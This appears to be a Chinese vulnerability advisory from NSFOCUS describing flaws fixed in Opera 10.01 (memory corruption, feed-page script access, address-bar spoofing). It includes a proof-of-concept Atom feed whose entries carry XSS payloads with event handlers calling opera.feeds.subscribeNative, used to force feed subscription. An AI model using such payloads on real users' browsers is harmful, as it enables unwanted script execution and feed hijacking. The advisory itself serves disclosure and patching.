安全研究

安全漏洞
Opera Web浏览器10.01版本修复多个安全漏洞

发布日期:2009-10-28
更新日期:2009-10-29

受影响系统:
Opera Software Opera Web Browser < 10.01
不受影响系统:
Opera Software Opera Web Browser 10.01
描述:
BUGTRAQ  ID: 36850
CVE(CAN) ID: CVE-2009-3831,CVE-2009-3832

Opera是一款流行的WEB浏览器,支持多种平台。

Opera的10.01之前版本中存在多个安全漏洞,可能允许恶意用户读取敏感信息、执行任意指令或执行欺骗攻击。

1) 处理域名时的内存破坏可能导致执行任意代码。

2) Opera可能允许在源订阅页面上运行脚本以获得对源对象的访问,这可能导致自动订阅源或读取其他源。

3) 在Windows上处理Web字体时的错误可能导致更改地址字段的字体,在地址中显示任意域名。

<*来源:Chris Weber
        John Daggett
  
  链接:http://secunia.com/advisories/37182/
        http://www.opera.com/support/kb/view/938/
        http://www.opera.com/support/kb/view/939/
        http://www.opera.com/support/kb/view/940/
        http://securethoughts.com/2009/10/hijacking-operas-native-page-using-malicious-rss-payloads/
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

<?xml version="1.0" encoding="utf-8"?>
<feed
  xmlns="http://www.w3.org/2005/Atom"
  xml:base="http://www.securethoughts.com/security/rssatomxss/opera10exploit2.atom">
  <id>http://www.securethoughts.com/security/rssatomxss/opera10exploit2.atom</id>
  <title>Feed Injection in Opera 10 Feed Aggregator</title>
  <updated>2009-09-09T00:00:00Z</updated>
  <link href="/wp" />
  <link rel="self" href="" />
  <author><name>Inferno</name></author>
  <contributor>
    <name>Inferno</name>
    <div xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
      This exploit will inject this feed in Opera's inbuilt feed aggregator
    </div>
  </contributor>

  <entry>
    <title>Feed Injector 1</title>
    <id>http://www.securethoughts.com/security/rssatomxss/opera10exploit2.atom#1</id>
    <link href="http://www.securethoughts.com/security/rssatomxss/opera10exploit2.atom#1"/>
    <content type="xhtml"><div xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"><img src="http://google.com" onerror="opera.feeds.subscribeNative(location.href)"></img>
    </div></content>
    <updated>2009-09-09T00:00:00Z</updated>
  </entry>
  
  <entry>
    <title>Feed Injector 2</title>
    <id>http://www.securethoughts.com/security/rssatomxss/opera10exploit2.atom#2</id>
    <link href="http://www.securethoughts.com/security/rssatomxss/opera10exploit2.atom#2"/>
    <content type="xhtml"><div xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"><p onmouseover="opera.feeds.subscribeNative(location.href)">Mouse over me</p>
    </div></content>
    <updated>2009-09-09T00:00:00Z</updated>
  </entry>
  
    <entry>
    <title>Feed Injector 3</title>
    <id>http://www.securethoughts.com/security/rssatomxss/opera10exploit2.atom#3</id>
    <link href="http://www.securethoughts.com/security/rssatomxss/opera10exploit2.atom#3"/>
    <content type="xhtml"><div xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"><a href="http://google.com" onmouseover="opera.feeds.subscribeNative(location.href)">Mouse over me</a>
    </div></content>
    <updated>2009-09-09T00:00:00Z</updated>
   </entry>
  
  <entry>
    <title>Basic Script</title>
    <id>http://www.securethoughts.com/security/rssatomxss/opera10exploit2.atom#4</id>
    <link href="http://www.securethoughts.com/security/rssatomxss/opera10exploit2.atom#4"/>
    <content type="xhtml"><div xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"><script>window.alert('XSS #1')</script></div></content>
    <updated>2009-09-09T00:00:00Z</updated>
  </entry>
</feed>

建议:
厂商补丁:

Opera Software
--------------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

http://www.opera.com

浏览次数:2640
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障